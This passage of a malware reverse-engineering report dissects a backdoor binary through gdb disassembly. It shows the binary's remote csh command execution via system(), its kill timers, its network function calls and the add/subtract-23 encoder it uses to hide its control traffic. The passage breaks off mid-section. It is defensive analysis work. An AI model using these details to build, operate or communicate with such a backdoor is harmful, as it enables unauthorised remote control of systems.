0x806766a 0x806766a: "sh" Most certainly doesn't take a genius to guess what this function is, however, we'll try prove it anyway: Calls 0x80571b8: 0x80571bc: movl $0xb,%eax 0x80571ca: int $0x80 This corresponds to a __NR_execve call. It must be an execl() call due to the parameters. There appears to be further code for a close() and exit() after the execl() call, but theoretically these wouldn't normally be called? 0x08048acc: First up: 0x8048acc: call 0x80571e8 0x8048ad1: movl %eax,0x807e770 0x8048ad6: testl %eax,%eax 0x8048ad8: jne 0x8048eb8 Translates into a fork whereby the parent ends up with PID_Var_A being set to the PID of the child process, and then jumps back to the main recv() loop. The child continues on however: 0x8048ade: call 0x805733c 0x8048ae3: pushl $0x1 0x8048ae5: pushl $0x11 0x8048ae7: call 0x80569bc These same lines have been seen before. 
They are simply a setsid() followed by a signal(SIGCHLD, SIG_IGN). Following the setup, as expected, a fork occurs:

    0x8048aec: call 0x80571e8
    0x8048af1: addl $0x8,%esp
    0x8048af4: testl %eax,%eax
    0x8048af6: je 0x8048b18

The child process jumps off to 0x8048b18, while the parent continues:

    0x8048af8: pushl $0x4b0
    0x8048afd: call 0x80556cc
    0x8048b02: pushl $0x9
    0x8048b04: movl 0x807e770,%eax
    0x8048b09: pushl %eax
    0x8048b0a: call 0x80572b0
    0x8048b0f: pushl $0x0
    0x8048b11: call 0x8055fbc

The first call would correspond to a sleep(0x4b0). The second is a kill(), whereby the PID to be killed is the value at 0x807e770. This has been deemed to be PID_Var_A, but will have been set to 0 as a result of the fork() earlier. The outcome of a kill(0, 9) was examined earlier in the case section for 0x08048590. It appears to have an identical purpose in this instance. That is, it will see to it that this case section will only exist for a maximum time of 1200 seconds. Following the kill, an exit() is called, thus ending this section.

The child process of the fork at 0x8048aec will now be examined:

    0x8048b1c: movb 0xfffff002(%ebx,%ebp,1),%al
    0x8048b23: movb %al,0xfffff000(%ebx,%ebp,1)
    0x8048b2a: incl %ebx
    0x8048b2b: cmpl $0x18d,%ebx
    0x8048b31: jle 0x8048b1c

The above is a loop that will repeat 0x18e times (for %ebx from 0 through 0x18d, assuming it starts at 0). Its purpose appears to be to shift the contents of the buffer at 0xfffff000 left by 2 bytes. This buffer is the one believed to be a decoded version of 0xfffff800.

Keeping in similarity with what we saw in a previous case section:

    0x8048b33: movl 0xffffbb20(%ebp),%edx
    0x8048b39: pushl %edx
    0x8048b3a: pushl $0x8067675
    0x8048b3f: leal 0xfffff800(%ebp),%ebx
    0x8048b45: pushl %ebx
    0x8048b46: call 0x804f808

The 0x804f808 call is currently assumed to be a sprintf().
In looking at the parameters passed to it: function(0xfffff800(%ebp), 0x8067675, *0xffffbb20(%ebp)) 0xfffff800(%ebp) would be the destination buffer, 0x8067675 should be the format string, and *0xffffbb20(%ebp) should be the address of the corresponding input according to the format string. (gdb) x/1s 0x8067675 0x8067675: "/bin/csh -f -c \"%s\" " Indeed, the format string holds true, the buffer starting 0xfffff800(%ebp) is the same one used to initially store the recv()'d buffer, and *0xffffbb20(%ebp) points to the buffer that was just shifted (0xfffff000(%ebp)). It should appear fairly obvious at this point that 0xfffff000(%ebp) would contain some command and is more than likely some derived command from the recv()'d packet's data. As expected, and as seen earlier: 0x8048b4b: pushl %ebx 0x8048b4c: call 0x80557e8 0x8048b51: pushl $0x0 0x8048b53: call 0x8057554 The first call corresponds to a system() call using the string just constructed. Following this, _exit() is called, thus ending this case section. It should be noted that if the system() command takes more than 1200 seconds, this case section will effectively be kill()'ed, along with any command that was running. 0x08048b58: This section is very short, but seems to be very important to this binary: 0x8048b58: movl 0x807e774,%eax 0x8048b5d: testl %eax,%eax 0x8048b5f: je 0x8048eb8 0x8048b65: pushl $0x9 0x8048b67: pushl %eax 0x8048b68: call 0x80572b0 0x8048b6d: movl $0x0,0x807e774 0x8048b77: addl $0x8,%esp 0x8048b7a: jmp 0x8048eb8 PID_Var_B is the basis of this case section. If PID_Var_B is non-zero, it will be used in a kill statement, using PID_Var_B as the PID to be killed. Currently there have been three case sections that use PID_Var_B. It seems to be used in a way so that only one of these case sections can be running at any one time. While any one of these are running, PID_Var_B will contain their PID. 
This case section appears to be a way of stopping any other running case section (minus the first two which possibly do not have ongoing processes, or ones such as the system() sections which contain their own kill() code. If PID_Var_B is zero (indicating no other ongoing case section is running), execution will immediately jump back to the main recv() loop. If PID_Var_B is nonzero, indicating another case section is running, the PID indicated by PID_Var_B will be killed and execution will be returned back to the main recv() loop. 0x08048b80: As with other case sections: 0x8048b80: cmpl $0x0,0x807e774 0x8048b87: jne 0x8048eb8 We check PID_Var_B and if it is zero (certain other sections are not running) we continue, if not we simply return to the main recv() loop. Once again, we see the following similar code: 0x8048b8d: movl $0x9,0x807e778 0x8048b97: call 0x80571e8 0x8048b9c: movl %eax,0x807e774 0x8048ba1: testl %eax,%eax 0x8048ba3: jne 0x8048eb8 We set Global_C to 9 (this is the 9th case section strangely enough...). 0x80571e8 matches up to a fork() call, with the parent process having the PID of the child stored once again into PID_Var_B. The parent process then continues by jumping back to the main recv() loop. The child then does a buffer copy: 0x8048ba9: leal 0xffffbb44(%ebp),%edi 0x8048baf: leal 0xfffff000(%ebp),%esi 0x8048bb5: cld 0x8048bb6: movl $0x3f,%ecx 0x8048bbb: repz movsl %ds:(%esi),%es:(%edi) 0x8048bbd: movsw %ds:(%esi),%es:(%edi) 0x8048bbf: movsb %ds:(%esi),%es:(%edi) Strange method of copy, but easy to see nonetheless. This code is identical to code seen in some earlier case sections. It seems to copy 255 bytes of data from the buffer sent to Data_Manipulation_Function_A into Buffer_B. 
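The byte counts involved in this copy, and in the shift loops that accompany it in these case sections, can be checked with a short sketch. The function names are invented for the example, and the sample buffer contents are arbitrary; only the counts (0x3f dwords, one word, one byte, and a loop bound of 0xfe) come from the disassembly.

```python
def string_copy_length(ecx):
    """Bytes moved by 'rep movsl' with %ecx dwords, then movsw, then movsb."""
    return ecx * 4 + 2 + 1


def shift_left(buf, shift, last_index=0xfe):
    """Mimic the movb loop: buf[i] = buf[i + shift] for i in 0..last_index."""
    out = bytearray(buf)
    for i in range(last_index + 1):
        out[i] = out[i + shift]
    return bytes(out)


print(string_copy_length(0x3f))  # 255

# The loop reads up to index 0xfe + shift, so the buffer has to hold at
# least 0xff + shift bytes (264 for a shift of 9).
demo = bytes(range(256)) + bytes(9)  # arbitrary sample contents
shifted = shift_left(demo, 9)
print(shifted[0], shifted[1])  # 9 10
```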
Following this, we start another loop: 0x8048bc4: movb 0xffffbb4e(%ebx,%ebp,1),%al 0x8048bcb: movb %al,0xffffbb44(%ebx,%ebp,1) 0x8048bd2: incl %ebx 0x8048bd3: cmpl $0xfe,%ebx 0x8048bd9: jle 0x8048bc4 This loop has the effect of shifting the buffer starting at 0xffffbb44 (Buffer_B) left by 10 bytes. The long stack setup for another call then starts: 0x8048bdb: leal 0xffffbb44(%ebp),%eax 0x8048be1: pushl %eax 0x8048be2: movzbl 0xfffff009(%ebp),%eax 0x8048be9: pushl %eax 0x8048bea: movzbl 0xfffff008(%ebp),%eax 0x8048bf1: pushl %eax 0x8048bf2: movzbl 0xfffff007(%ebp),%eax 0x8048bf9: pushl %eax 0x8048bfa: movzbl 0xfffff006(%ebp),%eax 0x8048c01: pushl %eax 0x8048c02: movzbl 0xfffff005(%ebp),%eax 0x8048c09: pushl %eax 0x8048c0a: movzbl 0xfffff004(%ebp),%eax 0x8048c11: pushl %eax 0x8048c12: movzbl 0xfffff003(%ebp),%eax 0x8048c19: pushl %eax 0x8048c1a: movzbl 0xfffff002(%ebp),%eax 0x8048c21: pushl %eax 0x8048c22: call 0x8049174 This all corresponds to: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), Buffer_B) The function at 0x8049174 contains calls to the socket() function among others. A quick look at the function addressing list shows this function was called in an earlier case section, and has already been named Network_Function_B. It will be analysed in depth later. In keeping with other function termination: 0x8048c2a: pushl $0x0 0x8048c2c: call 0x8057554 A call of _exit(0) completes this child process's life. 0x08048c34: This section's analysis looks like it could almost be cp/pasted from the previous one. It starts off the same: 0x8048c34: cmpl $0x0,0x807e774 0x8048c3b: jne 0x8048eb8 0x8048c41: movl $0xa,0x807e778 0x8048c4b: call 0x80571e8 0x8048c50: movl %eax,0x807e774 0x8048c55: testl %eax,%eax 0x8048c57: jne 0x8048eb8 The normal check of PID_Var_B, followed by the setting of Global_C. 
Then along comes the fork() code with the PID being stored into PID_Var_B and the parent then returning back to the main recv() code, leaving the child to undertake the rest of the section:

    0x8048c5d: leal 0xffffbb44(%ebp),%edi
    0x8048c63: leal 0xfffff000(%ebp),%esi
    0x8048c69: cld
    0x8048c6a: movl $0x3f,%ecx
    0x8048c6f: repz movsl %ds:(%esi),%es:(%edi)
    0x8048c71: movsw %ds:(%esi),%es:(%edi)
    0x8048c73: movsb %ds:(%esi),%es:(%edi)

The same 255 byte copy from 0xfffff000 to Buffer_B, followed by the same byte shift code:

    0x8048c78: movb 0xffffbb52(%ebx,%ebp,1),%al
    0x8048c7f: movb %al,0xffffbb44(%ebx,%ebp,1)
    0x8048c86: incl %ebx
    0x8048c87: cmpl $0xfe,%ebx
    0x8048c8d: jle 0x8048c78

In this case, shifting Buffer_B's data to the left by 14 bytes. And in keeping with similarity, we then commence with the stack setup for some function:

    0x8048c8f: leal 0xffffbb44(%ebp),%eax
    0x8048c95: pushl %eax
    0x8048c96: movzbl 0xfffff00d(%ebp),%eax
    0x8048c9d: pushl %eax
    0x8048c9e: pushl $0x0
    0x8048ca0: movzbl 0xfffff00c(%ebp),%eax
    0x8048ca7: pushl %eax
    0x8048ca8: movzbl 0xfffff00b(%ebp),%eax
    0x8048caf: pushl %eax
    0x8048cb0: movzbl 0xfffff00a(%ebp),%eax
    0x8048cb7: pushl %eax
    0x8048cb8: movzbl 0xfffff009(%ebp),%eax
    0x8048cbf: pushl %eax
    0x8048cc0: movzbl 0xfffff008(%ebp),%eax
    0x8048cc7: pushl %eax
    0x8048cc8: movzbl 0xfffff007(%ebp),%eax
    0x8048ccf: pushl %eax
    0x8048cd0: movzbl 0xfffff006(%ebp),%eax
    0x8048cd7: pushl %eax
    0x8048cd8: movzbl 0xfffff005(%ebp),%eax
    0x8048cdf: pushl %eax
    0x8048ce0: movzbl 0xfffff004(%ebp),%eax
    0x8048ce7: pushl %eax
    0x8048ce8: movzbl 0xfffff003(%ebp),%eax
    0x8048cef: pushl %eax
    0x8048cf0: movzbl 0xfffff002(%ebp),%eax
    0x8048cf7: pushl %eax
    0x8048cf8: call 0x8049d40

Putting the code into C format:

    function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
             *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
             *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
             *0xfffff00b(%ebp), *0xfffff00c(%ebp), 0, *0xfffff00d(%ebp),
             0xffffbb44(%ebp))

The call at 0x8049d40 is unknown, contains network calls to socket() and others, and as such has been named Network_Function_D for later analysis.

As expected, the child process then ends with an _exit() call.

0x08048d08:

Yet again we are left with almost identical code to the previous case section. In an attempt to not write unnecessary things, only the differences will be noted:

    0x8048d15: movl $0xb,0x807e778

Global_C is set to 11 (as expected). The byte shift for Buffer_B is 15 bytes for this case section. Function setup looks like this:

    0x8048d63: leal 0xffffbb44(%ebp),%eax
    0x8048d69: pushl %eax
    0x8048d6a: movzbl 0xfffff00e(%ebp),%eax
    0x8048d71: pushl %eax
    0x8048d72: movzbl 0xfffff00d(%ebp),%eax
    0x8048d79: pushl %eax
    0x8048d7a: movzbl 0xfffff00c(%ebp),%eax
    0x8048d81: pushl %eax
    0x8048d82: movzbl 0xfffff00b(%ebp),%eax
    0x8048d89: pushl %eax
    0x8048d8a: movzbl 0xfffff00a(%ebp),%eax
    0x8048d91: pushl %eax
    0x8048d92: movzbl 0xfffff009(%ebp),%eax
    0x8048d99: pushl %eax
    0x8048d9a: movzbl 0xfffff008(%ebp),%eax
    0x8048da1: pushl %eax
    0x8048da2: movzbl 0xfffff007(%ebp),%eax
    0x8048da9: pushl %eax
    0x8048daa: movzbl 0xfffff006(%ebp),%eax
    0x8048db1: pushl %eax
    0x8048db2: movzbl 0xfffff005(%ebp),%eax
    0x8048db9: pushl %eax
    0x8048dba: movzbl 0xfffff004(%ebp),%eax
    0x8048dc1: pushl %eax
    0x8048dc2: movzbl 0xfffff003(%ebp),%eax
    0x8048dc9: pushl %eax
    0x8048dca: movzbl 0xfffff002(%ebp),%eax
    0x8048dd1: pushl %eax
    0x8048dd2: call 0x8049d40

Putting this into C format:

    function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
             *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
             *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
             *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
             *0xfffff00e(%ebp), 0xffffbb44(%ebp))

The call is to the same function as in the previous case section, and is named Network_Function_D. There only appears to be one difference in the call, and that has to do with the 12th argument which before was a 0, and in this case is probably set by the blackhat manually.
Upon function conclusion the function will _exit(0) as usual.

0x08048de4:

Yet again, we end up with very similar code. Again, only the differences will be noted:

    0x8048df1: movl $0xc,0x807e778

Global_C is set to 12 (as expected). The byte shift for Buffer_B is 14 bytes for this case section. Function setup looks like this:

    0x8048e3f: leal 0xffffbb44(%ebp),%eax
    0x8048e45: pushl %eax
    0x8048e46: movzbl 0xfffff00d(%ebp),%eax
    0x8048e4d: pushl %eax
    0x8048e4e: movzbl 0xfffff00c(%ebp),%eax
    0x8048e55: pushl %eax
    0x8048e56: movzbl 0xfffff00b(%ebp),%eax
    0x8048e5d: pushl %eax
    0x8048e5e: movzbl 0xfffff00a(%ebp),%eax
    0x8048e65: pushl %eax
    0x8048e66: movzbl 0xfffff009(%ebp),%eax
    0x8048e6d: pushl %eax
    0x8048e6e: movzbl 0xfffff008(%ebp),%eax
    0x8048e75: pushl %eax
    0x8048e76: movzbl 0xfffff007(%ebp),%eax
    0x8048e7d: pushl %eax
    0x8048e7e: movzbl 0xfffff006(%ebp),%eax
    0x8048e85: pushl %eax
    0x8048e86: movzbl 0xfffff005(%ebp),%eax
    0x8048e8d: pushl %eax
    0x8048e8e: movzbl 0xfffff004(%ebp),%eax
    0x8048e95: pushl %eax
    0x8048e96: movzbl 0xfffff003(%ebp),%eax
    0x8048e9d: pushl %eax
    0x8048e9e: movzbl 0xfffff002(%ebp),%eax
    0x8048ea5: pushl %eax
    0x8048ea6: call 0x8049564

C Format:

    function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
             *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
             *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
             *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
             0xffffbb44(%ebp))

The function call to 0x8049564 seems to be new, contains network function calls, and as such will be named Network_Function_E. The child process would then terminate with a call to _exit().

This concludes the case sections, and as such, the core functionality of the binary. The program has now been shown to have the following on demand from the blackhat:

* Ability to execute given commands using csh.
* The ability to potentially show the response from executing such a command to the blackhat.
* Ability to automatically terminate the execution of those commands after a certain period of time.
* The ability to execute various functions, one at a time.
* The ability to terminate those functions.

The first two case statements are extremely interesting, and would have to be of some importance, however their secrets are not yet known. As the binary stands, the core functionality of it appears solid, and built in a modular way such that any function that is called is immediately forked off (and secure from crashing the rest of the daemon). An analysis of the traffic expected by the binary will be completed in Network_Analysis_A.

vi) Function Addressing:

    Address     Function                        Purpose
    0x805720c   geteuid()                       Standard
    0x8055fbc   exit()*                         Standard
    0x8057764   memset()*                       Standard
    0x80569bc   signal()                        Standard
    0x80571e8   fork()                          Standard
    0x805733c   setsid()*                       Standard
    0x8057134   chdir()                         Standard
    0x8057160   close()                         Standard
    0x8057444   time()                          Standard
    0x80559a0   srandom()**                     Standard
    0x8056cf4   socket()                        Standard
    0x8056b44   recv()                          Standard
    0x80555b0   usleep()*                       Standard
    0x804a1e8   Data_Manipulation_Function_A    Memory Manipulation
    0x804a194   Data_Manipulation_Function_B    Memory Manipulation
    0x8048ecc   Network_Function_A              Network
    0x8049174   Network_Function_B              Network
    0x80499f4   Network_Function_C              Network
    0x8049d40   Network_Function_D              Network
    0x8049564   Network_Function_E              Network
    0x8048f94   Network_Function_F              Network
    0x8056058   random()**                      Standard (Or a wrapper)
    0x8055e38   random()**                      Standard
    0x80556cc   sleep()*                        Standard
    0x80572b0   kill()                          Standard
    0x80557e8   system()**                      Standard
    0x804f808   sprintf()**                     Standard
    0x804f620   fopen()*                        Standard
    0x804f6d4   fread()**                       Standard
    0x804f540   fclose()**                      Standard
    0x8057554   _exit()                         Standard
    0x8056c9c   setsockopt()                    Standard
    0x8056a74   bind()                          Standard
    0x8056b04   listen()                        Standard
    0x8056a2c   accept()                        Standard
    0x8056bf0   send()                          Standard
    0x805718c   dup2()                          Standard
    0x804a2a8   setenv()*                       Standard
    0x804a48c   unsetenv()**                    Standard
    0x80555fc   execl()                         Standard
    0x804bf80   gethostbyname()*                Standard
    0x8056480   Misc_Data_Copy()                Standard (Assumed)
    0x8056c3c   sendto()                        Standard
    0x804ce8c   inet_addr()                     Standard
    0x804ceb4   inet_aton()                     Standard

    *  = Unconfirmed but strongly suspected
    ** = Guess based upon positioning of call

vii) Variable Addressing:

    0x807e77c           Global_A
    0x807e784           Global_B
    0x807e778           Global_C
    0xffffee48(%ebp)    Buffer_A (code starting at 0x8048134)
    0xffffbb44(%ebp)    Buffer_B (code starting at 0x8048134)
    0x807e770           PID_Var_A
    0x807e774           PID_Var_B

viii) Function Analysis

This section will look at the functions that were detected to be of significance in the prior analysis.

a) Data_Manipulation_Function_A [0x804a1e8] - (Memory Manipulation)

Known Usage:

    function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer)

Guesses at purpose:

From the position in which this function appears to be used, it is assumed that it is some sort of decoder used for translating packet data in the communication channel between the blackhat and this binary. It should be noted that this function would be very deliberate, and the code about to be analysed could very well be a public encryption method. It is also quite possible this function does not follow generic C syntax for the production of assembly code since it may well have been written in assembly.

Naming Conventions:

Parameters will be given the following names:

    function(DataAmount, Data_In, Data_Out)

Disassembly:

The code starts off strangely for a C function. The initial stack allocations are quite strange:

    0x804a1f1: movl 0x8(%ebp),%edi
    0x804a1f4: leal 0xffffffff(%edi),%ebx
    0x804a1f7: leal 0x3(%edi),%eax
    0x804a1fa: andb $0xfc,%al
    0x804a1fc: subl %eax,%esp

The long at 0x8(%ebp) would be the "DataAmount" (given the %ebp push and the sub at 0x804a1eb). It's assumed this is some kind of data amount that the function will have to decode. The code above seems to have the effect of setting up a stack that is directly proportional to the DataAmount + 3.
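The leal 0x3 / andb $0xfc / subl sequence is the usual "round up to a multiple of 4" idiom. A small sketch of the arithmetic (the function name is made up for illustration):

```c
#include <stdint.h>

/* Hypothetical helper: the number of bytes subtracted from %esp.
 * andb $0xfc,%al only clears the low two bits of %eax, so it acts
 * like masking the whole register with 0xfffffffc. */
static uint32_t stack_alloc_size(uint32_t data_amount)
{
    return (data_amount + 3) & 0xfffffffcu;
}
```

So a DataAmount of 5 reserves 8 bytes, and a DataAmount of 255 reserves 256 bytes. This looks like a variable-length local array or an alloca()-style allocation, although that is only a guess.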
The andb statement appears to simply ensure a 4 byte alignment of the total stack allocation.

Something else strange:

    0x804a201: movb 0x80675e5,%al
    0x804a207: movl 0x10(%ebp),%esi
    0x804a20a: movb %al,(%esi)

    (gdb) x/1b 0x80675e5
    0x80675e5: 0x00

Three instructions to simply zero the first byte of Data_Out (remembering the parameters start from 0x8(%ebp)).

Starting at 0x804a20c, there looks to be some kind of looping structure with %ebx as a counter. %ebx is first set up here:

    0x804a1f1: movl 0x8(%ebp),%edi
    0x804a1f4: leal 0xffffffff(%edi),%ebx

This corresponds to %ebx starting at DataAmount - 1. The looping structure seems to start here:

    0x804a20c: testl %ebx,%ebx
    0x804a20e: jl 0x804a29b

Indicating the loop will continue until %ebx reaches a state of < 0.

    0x804a214: leal 0xffffffff(%ebx),%edx
    0x804a217: testl %ebx,%ebx
    0x804a219: je 0x804a22c

%edx is set to %ebx - 1. %ebx is checked: if it does NOT equal 0 then:

    0x804a21b: movl 0xc(%ebp),%esi
    0x804a21e: movzbl (%ebx,%esi,1),%eax
    0x804a222: movzbl (%edx,%esi,1),%edx
    0x804a226: subl %edx,%eax
    0x804a228: jmp 0x804a232

0xc(%ebp) corresponds to Data_In, so the address of the Data_In buffer is loaded into %esi. The movzbl instructions effectively use %ebx and %edx as indexes within the Data_In buffer, the first one loading %eax with the byte indexed by %ebx, and the second loading %edx with the byte indexed by %edx. The subl has the effect of subtracting the value of Data_In[%edx] from Data_In[%ebx]. Keeping in mind %edx = %ebx - 1, this makes it look like:

    %eax = Data_In[%ebx] - Data_In[%ebx - 1]

This statement also explains the reason for the earlier conditional on %ebx being 0, for which the following would occur:

    0x804a22c: movl 0xc(%ebp),%esi
    0x804a22f: movzbl (%esi),%eax

This effectively just does:

    %eax = Data_In[0]

Which eliminates the -1 indexing.
Whichever branch of the conditional it follows, execution will end up at 0x804a232:

    0x804a232: leal 0xffffffe9(%eax),%ecx
    0x804a235: testl %ecx,%ecx
    0x804a237: jnl 0x804a244

This subtracts 23 from %eax and puts it into %ecx. This value is then checked to be non-negative (jnl jumps if it is not less than 0). If it is negative:

    0x804a23c: addl $0x100,%ecx
    0x804a242: js 0x804a23c

the above loop keeps adding 0x100 to %ecx until it is no longer negative. As soon as %ecx is ensured to be non-negative:

    0x804a244: xorl %edx,%edx
    0x804a246: cmpl %edi,%edx
    0x804a248: jnl 0x804a25d

%edx will of course be 0 for this statement. %edi however will still be equal to DataAmount. The statements above simply result in a jump to 0x804a25d if 0 is not less than DataAmount (i.e. if DataAmount <= 0). A loop follows:

    0x804a24c: movl 0x10(%ebp),%esi
    0x804a24f: movb (%edx,%esi,1),%al
    0x804a252: movl 0xfffffffc(%ebp),%esi
    0x804a255: movb %al,(%edx,%esi,1)
    0x804a258: incl %edx
    0x804a259: cmpl %edi,%edx
    0x804a25b: jl 0x804a24c

0x10(%ebp) is matched with the address of the start of the Data_Out buffer. 0xfffffffc(%ebp) was set up earlier to point to the end of the local stack frame, more specifically to a buffer believed to have been set up to be the same size as DataAmount. With this knowledge, the above loop can be seen to copy data one byte at a time from Data_Out to this localised buffer. The total amount copied will be DataAmount bytes (%edi).

Following this duplication of Data_Out:

    0x804a25d: movl 0x10(%ebp),%esi
    0x804a260: movb %cl,(%esi)

The outcome of these two lines will be to set the first byte of Data_Out to the low byte of %ecx as last modified at 0x804a23c (the value that was continually incremented until it was no longer negative).

The following is the setup to the next loop:

    0x804a262: movl $0x1,%edx
    0x804a267: cmpl %edi,%edx
    0x804a269: jnl 0x804a27e

Similar to the earlier loop, %edi is still = DataAmount, and %edx forms a loop counter which is initialised to 1.
Now for the loop:

    0x804a26c: movl 0xfffffffc(%ebp),%esi
    0x804a26f: movb 0xffffffff(%edx,%esi,1),%al
    0x804a273: movl 0x10(%ebp),%esi
    0x804a276: movb %al,(%edx,%esi,1)
    0x804a279: incl %edx
    0x804a27a: cmpl %edi,%edx
    0x804a27c: jl 0x804a26c

0xfffffffc(%ebp) is still the same pointer to a local buffer as it was in the last loop. The loop is a byte copy routine that seems to have the purpose of copying the local buffer back into Data_Out, shifted to the right by 1 byte.

Next up is a call:

    0x804a27e: movl 0xfffffffc(%ebp),%esi
    0x804a281: pushl %esi
    0x804a282: pushl %ecx
    0x804a283: pushl $0x80678bf
    0x804a288: movl 0x10(%ebp),%esi
    0x804a28b: pushl %esi
    0x804a28c: call 0x804f808

0xfffffffc(%ebp) still points to the local buffer. %ecx is the same byte as earlier, the one that all the operations were done upon. 0x80678bf:

    (gdb) x/1s 0x80678bf
    0x80678bf: "%c%s"

The function at 0x804f808 corresponds to an sprintf(), which matches the inputs given.

Continuing with the main loop:

    0x804a294: decl %ebx
    0x804a295: jns 0x804a214

As a reminder, %ebx started the loop at DataAmount - 1. According to the above, it will finish after completing a round with %ebx = 0. This is effectively the end of the function.

Disassembly Review:

It turns out this function is not as complex as expected. It is actually quite simple. It seems to be a generic data obfuscation function that will take a buffer of N bytes, and produce an obfuscated buffer of N bytes. The method is very simple, whereby the loop starts at the end of Data_In, taking one byte at a time and subtracting the byte directly before it. On top of this, what looks to be some arbitrary value of 23 is also subtracted from it. The result of these subtractions forms the last byte of the Data_Out buffer. The loop cycles through doing this for the entire buffer, obviously leaving out the subtraction of the 'previous' byte when it reaches the start of Data_In.

Function Overview:

An obvious encoder/decoder.
This functionality was already assumed from the ways this function and Data_Manipulation_Function_B were used throughout the rest of the code. The fact that this function is called on packets that have been recv()'d, while Data_Manipulation_Function_B is called just before functions that look to send (yet to be absolutely certain), suggests that Data_Manipulation_Function_A is more than likely a decoder function, and Data_Manipulation_Function_B will probably be an encoder function.

b) Data_Manipulation_Function_B [0x804a194] - (Memory Manipulation)

Known Usage:

    function(number, Buffer1, Buffer2)

Guesses at purpose:

After the analysis of Data_Manipulation_Function_A, the purpose of Data_Manipulation_Function_B doesn't take too much imagination to come up with. It is more than likely the matching encoder function for a buffer of data.

Naming Conventions:

Parameters will be given the following names:

    function(DataAmount, Data_In, Data_Out)

Disassembly:

One of the first functional things to occur:

    0x804a19a: movl 0x8(%ebp),%edi
    0x804a19d: movl 0xc(%ebp),%esi
    0x804a1a0: movl 0x10(%ebp),%ebx
    0x804a1a3: movb 0x80675e5,%al
    0x804a1a9: movb %al,(%ebx)

To put references on everything, 0x8(%ebp) would be DataAmount, 0xc(%ebp) corresponds to a pointer to the Data_In buffer, and 0x10(%ebp) will be a pointer to the Data_Out buffer. The last two lines simply seem to set the first byte of the Data_Out buffer to 0 (albeit a strange way of doing it).

We then start setting up for a call:

    0x804a1ab: movb (%esi),%al
    0x804a1ad: addb $0x17,%al
    0x804a1af: movsbl %al,%eax
    0x804a1b2: pushl %eax
    0x804a1b3: pushl $0x80678bc
    0x804a1b8: pushl %ebx
    0x804a1b9: call 0x804f808

    (gdb) x/1s 0x80678bc
    0x80678bc: "%c"

The 0x804f808 call corresponds to a sprintf() call. Obviously the format string is for a single character, and the destination is Data_Out. The character will consist of the first byte from Data_In, plus 0x17.
This appears to be a setup to a loop:

    0x804a1be: movl $0x1,%ecx
    0x804a1c3: cmpl %edi,%ecx
    0x804a1c5: je 0x804a1dd

Initialising %ecx to 1 and checking whether it equals DataAmount (in which case the loop is skipped). If it doesn't, it continues:

    0x804a1c8: movzbl 0xffffffff(%ebx,%ecx,1),%edx
    0x804a1cd: movzbl (%ecx,%esi,1),%eax
    0x804a1d1: leal 0x17(%edx,%eax,1),%eax
    0x804a1d5: movb %al,(%ecx,%ebx,1)
    0x804a1d8: incl %ecx
    0x804a1d9: cmpl %edi,%ecx
    0x804a1db: jne 0x804a1c8

Remembering that %ebx points to Data_Out, one will see that the first statement loads %edx with an indexed value from Data_Out, corresponding to (%ecx - 1). %esi points to Data_In, as such, the second statement loads up an indexed byte from Data_In, corresponding to %ecx. The leal sees to the addition of the byte from Data_In, the byte from Data_Out, and a value of 0x17. The low byte of this value is then moved into the corresponding %ecx index in Data_Out. %ecx is incremented and the process starts over again using the next index along. This continues until it reaches the end of the buffer (indicated by %ecx meeting up with DataAmount), at which time the function is over, and it returns.

Disassembly Review:

A much simpler case than in Data_Manipulation_Function_A. The mirrored processing of Data_Manipulation_Function_A and Data_Manipulation_Function_B is obvious. This function simply forms a loop utilising a byte from Data_In, the previously encoded byte, and an arbitrary value of 23. These are added together, and only the low-order byte is kept (which is effectively the same as a modulus 0x100) to form the next encoded byte. The encoded bytes are stacked up in Data_Out.

Function Overview:

Once again, quite obviously an encoder/decoder. What becomes apparent from the combined analysis of these two functions is that there is no fixed 'encoder' and 'decoder'. Either function will encode a buffer, and the other function will decode it.
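To check that the two routines really are inverses in the direction used by the binary (B before sending, A after receiving), the arithmetic described above can be sketched in C. This is a simplified reconstruction, not the original code: the function names are made up, and the sprintf() based string building of the real functions (which would stop at a zero byte) is replaced by direct array writes.

```c
#include <stddef.h>
#include <stdint.h>

enum { KEY = 23 };  /* the constant 0x17 seen in both functions */

/* Sketch of Data_Manipulation_Function_B: running sum plus 23, mod 0x100. */
static void encode_b(size_t n, const uint8_t *in, uint8_t *out)
{
    if (n == 0)
        return;                       /* guard added for this sketch only */
    out[0] = (uint8_t)(in[0] + KEY);
    for (size_t i = 1; i < n; i++)
        out[i] = (uint8_t)(in[i] + out[i - 1] + KEY);
}

/* Sketch of Data_Manipulation_Function_A: difference minus 23, walking
 * from the last byte to the first, wrapping negatives by adding 0x100. */
static void decode_a(size_t n, const uint8_t *in, uint8_t *out)
{
    for (size_t i = n; i-- > 0; ) {
        int v = in[i] - (i ? in[i - 1] : 0) - KEY;
        while (v < 0)
            v += 0x100;               /* the addl $0x100 / js loop */
        out[i] = (uint8_t)v;
    }
}
```

Encoding the bytes of "hello" with encode_b and passing the result to decode_a gives back the original bytes, which supports the reading that the pair forms a simple running-sum obfuscation.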
In searching Google, several references to modulus-based ciphers describe similar methods of encoding data, but an exact reference to either pseudocode or actual program code to do what is done here could not be found.

c) Network_Function_A [0x8048ecc] - (Network)

Known Usage:

    function(Buffer1, Buffer2, number)

Guesses at purpose:

This function is believed to be a communications function to send data to the blackhat. The reason behind this belief is that just before this function was called, Data_Manipulation_Function_B was called. Data_Manipulation_Function_B is believed to be used as an encoding function. The only reason to call such an encoding function before sending network traffic is if it is part of the communications channel to the blackhat.

Naming Conventions:

Parameters will be given the following names:

